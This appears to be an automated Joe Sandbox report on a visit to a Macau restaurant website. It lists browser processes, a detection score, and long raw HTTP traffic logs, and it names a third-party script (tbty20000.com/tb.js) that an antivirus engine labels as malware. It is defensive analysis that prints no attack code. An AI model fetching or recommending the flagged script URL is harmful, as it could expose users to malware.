Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://www.gourmethousemacau.com/

Overview

General Information

Sample URL:http://www.gourmethousemacau.com/
Analysis ID:825076
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Sample execution stops while process was sleeping (likely an evasion)

Classification

  • System is w10x64
  • chrome.exe (PID: 4952 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 4780 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1680,i,17073344616250618205,18426531208198070436,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • chrome.exe (PID: 4512 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.gourmethousemacau.com/ MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • MpCmdRun.exe (PID: 2100 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://www.tbty20000.com/tb.jsAvira URL Cloud: Label: malware
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: unknownDNS traffic detected: queries for: clients2.google.com
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesCache-Control: max-age=31536000Content-Encoding: gzipContent-Length: 227Content-Type: text/javascriptDate: Mon, 13 Mar 2023 04:26:09 GMTEtag: "4078521116"Expires: Tue, 12 Mar 2024 04:26:09 GMTLast-Modified: Wed, 25 Nov 2015 07:47:55 GMTP3p: CP=" OTI DSP COR IVA OUR IND COM "Server: apacheSet-Cookie: BAIDUID=2F52D5B2DB20952BB15035AA4130F138:FG=1; max-age=31536000; expires=Tue, 12-Mar-24 04:26:09 GMT; domain=.baidu.com; path=/; version=1Vary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 03 65 8f c1 6a c3 30 10 44 7f 25 f1 c1 48 d8 5e f5 da 08 61 42 4f b9 16 72 69 14 8a 2a af 6d 41 2c 99 95 1c 43 db fc 7b ed 9a 9e 7a 59 98 81 79 8f dd b7 93 b7 c9 05 cf f8 d7 dd d0 0e 95 60 97 3e a5 f1 7b 3d f1 7a d0 42 8b 8b a9 3e 8f d5 db 53 f5 ac df 35 5c 0b 0d 1f c6 35 93 06 1b 06 2e 3a 57 92 9a 9d 6f c2 0c b7 60 cd 4a 83 9e b0 2d 83 6a 82 9d 06 f4 09 96 88 44 48 d2 b5 6c 8f 90 30 26 46 7c 73 7a 95 09 61 46 07 b1 37 84 1b 7b 45 8b 08 9d 6b 33 19 6a e6 0b 95 d5 a4 b2 02 bd 0d 0d 9e 5f 4f 2f 61 18 83 5f d0 ec 9f 83 97 94 e7 bf 93 fc b6 4c 16 cd e1 af a8 b7 42 ae da a4 3c ce bb d3 60 3a 94 09 22 59 e5 1f 0f b6 3d c2 e5 0f 97 51 90 77 19 01 00 00 Data Ascii: ej0D%H^aBOri*mA,C{zYy`>{=zB>S5\5.:Wo`J-jDHl0&F|szaF7{Ek3j_O/a_LB<`:"Y=Qw
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesCache-Control: max-age=31536000Content-Encoding: gzipContent-Length: 227Content-Type: text/javascriptDate: Mon, 13 Mar 2023 04:26:09 GMTEtag: "4078521116"Expires: Tue, 12 Mar 2024 04:26:09 GMTLast-Modified: Wed, 25 Nov 2015 07:47:55 GMTP3p: CP=" OTI DSP COR IVA OUR IND COM "Server: apacheSet-Cookie: BAIDUID=2F52D5B2DB20952BB15035AA4130F138:FG=1; max-age=31536000; expires=Tue, 12-Mar-24 04:26:09 GMT; domain=.baidu.com; path=/; version=1Vary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 03 65 8f c1 6a c3 30 10 44 7f 25 f1 c1 48 d8 5e f5 da 08 61 42 4f b9 16 72 69 14 8a 2a af 6d 41 2c 99 95 1c 43 db fc 7b ed 9a 9e 7a 59 98 81 79 8f dd b7 93 b7 c9 05 cf f8 d7 dd d0 0e 95 60 97 3e a5 f1 7b 3d f1 7a d0 42 8b 8b a9 3e 8f d5 db 53 f5 ac df 35 5c 0b 0d 1f c6 35 93 06 1b 06 2e 3a 57 92 9a 9d 6f c2 0c b7 60 cd 4a 83 9e b0 2d 83 6a 82 9d 06 f4 09 96 88 44 48 d2 b5 6c 8f 90 30 26 46 7c 73 7a 95 09 61 46 07 b1 37 84 1b 7b 45 8b 08 9d 6b 33 19 6a e6 0b 95 d5 a4 b2 02 bd 0d 0d 9e 5f 4f 2f 61 18 83 5f d0 ec 9f 83 97 94 e7 bf 93 fc b6 4c 16 cd e1 af a8 b7 42 ae da a4 3c ce bb d3 60 3a 94 09 22 59 e5 1f 0f b6 3d c2 e5 0f 97 51 90 77 19 01 00 00 Data Ascii: ej0D%H^aBOri*mA,C{zYy`>{=zB>S5\5.:Wo`J-jDHl0&F|szaF7{Ek3j_O/a_LB<`:"Y=Qw
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Length: 23Content-Type: image/gifServer: bfeDate: Mon, 13 Mar 2023 04:26:09 GMTData Raw: 1f 8b 08 00 00 00 00 00 00 ff 01 00 00 ff ff 00 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Length: 23Content-Type: image/gifServer: bfeDate: Mon, 13 Mar 2023 04:26:09 GMTData Raw: 1f 8b 08 00 00 00 00 00 00 ff 01 00 00 ff ff 00 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Length: 23Content-Type: image/gifServer: bfeDate: Mon, 13 Mar 2023 04:26:10 GMTData Raw: 1f 8b 08 00 00 00 00 00 00 ff 01 00 00 ff ff 00 00 00 00 00 00 00 00 Data Ascii:
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tb.js HTTP/1.1Host: www.tbty20000.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /11.0.1.js?d182b3f28525f2db83acfaaf6e696dba HTTP/1.1Host: jspassport.ssl.qhimg.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ssl/ab77b6ea7f3fbf79.js HTTP/1.1Host: s.ssl.qhres2.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.js?3eff88a357a8c5aca6bb583a65de2875 HTTP/1.1Host: hm.baidu.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif?l=http://www.gourmethousemacau.com/ HTTP/1.1Host: sp0.baidu.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2F&sid=d182b3f28525f2db83acfaaf6e696dba&token=d/1m8o2cb.3ufa2c8a5m2e5sfu2odhbt HTTP/1.1Host: s.360.cnConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif?l=http://www.gourmethousemacau.com/ HTTP/1.1Host: sp0.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=913&et=0&ja=0&ln=en-us&lo=0&rnd=2010534784&si=3eff88a357a8c5aca6bb583a65de2875&v=1.3.0&lv=1&sn=31345&r=0&ww=1280&u=http%3A%2F%2Fwww.gourmethousemacau.com%2F&tt=Gourmet%20House%20Macau%20Ltd HTTP/1.1Host: hm.baidu.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=C76EF187481BAB50
Source: global trafficHTTP traffic detected: GET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=913&et=0&ja=0&ln=en-us&lo=0&rnd=2010534784&si=3eff88a357a8c5aca6bb583a65de2875&v=1.3.0&lv=1&sn=31345&r=0&ww=1280&u=http%3A%2F%2Fwww.gourmethousemacau.com%2F&tt=Gourmet%20House%20Macau%20Ltd HTTP/1.1Host: hm.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=C76EF187481BAB50
Source: global trafficHTTP traffic detected: GET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2F&sid=d182b3f28525f2db83acfaaf6e696dba&token=d/1m8o2cb.3ufa2c8a5m2e5sfu2odhbt HTTP/1.1Host: s.360.cnConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /11.0.1.js?d182b3f28525f2db83acfaaf6e696dba HTTP/1.1Host: jspassport.ssl.qhimg.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-Modified-Since: Wed, 28 Nov 2018 07:43:20 GMT
Source: global trafficHTTP traffic detected: GET /hm.js?3eff88a357a8c5aca6bb583a65de2875 HTTP/1.1Host: hm.baidu.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=C76EF187481BAB50If-None-Match: a3ff24bedc9c1af4648015185ddef181
Source: global trafficHTTP traffic detected: GET /9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif?l=http://www.gourmethousemacau.com/Index.asp HTTP/1.1Host: sp0.baidu.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&sid=d182b3f28525f2db83acfaaf6e696dba&token=dp1s8a2.bx3efd2n8I5/2m5ofc2.duba HTTP/1.1Host: s.360.cnConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=913&et=0&ja=0&ln=en-us&lo=0&lt=1678710370&rnd=444628624&si=3eff88a357a8c5aca6bb583a65de2875&v=1.3.0&lv=2&sn=31365&r=0&ww=1280&u=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&tt=Gourmet%20House%20Macau%20Ltd HTTP/1.1Host: hm.baidu.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=C76EF187481BAB50
Source: global trafficHTTP traffic detected: GET /9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif?l=http://www.gourmethousemacau.com/Index.asp HTTP/1.1Host: sp0.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=913&et=0&ja=0&ln=en-us&lo=0&lt=1678710370&rnd=444628624&si=3eff88a357a8c5aca6bb583a65de2875&v=1.3.0&lv=2&sn=31365&r=0&ww=1280&u=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&tt=Gourmet%20House%20Macau%20Ltd HTTP/1.1Host: hm.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=C76EF187481BAB50
Source: global trafficHTTP traffic detected: GET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&sid=d182b3f28525f2db83acfaaf6e696dba&token=dp1s8a2.bx3efd2n8I5/2m5ofc2.duba HTTP/1.1Host: s.360.cnConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m/static/css/font-awesome.min.css HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /m/static/font-icon/font-awesome.min.css HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /static/bootstrap/css/bootstrap.min.css HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /m/static/css/index_smpc.css HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /m/static/css/index_mobile.css HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /m/static/css/index_ipad.css HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /m/static/css/index_bgpc.css HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
Source: global trafficHTTP traffic detected: GET /main.css HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
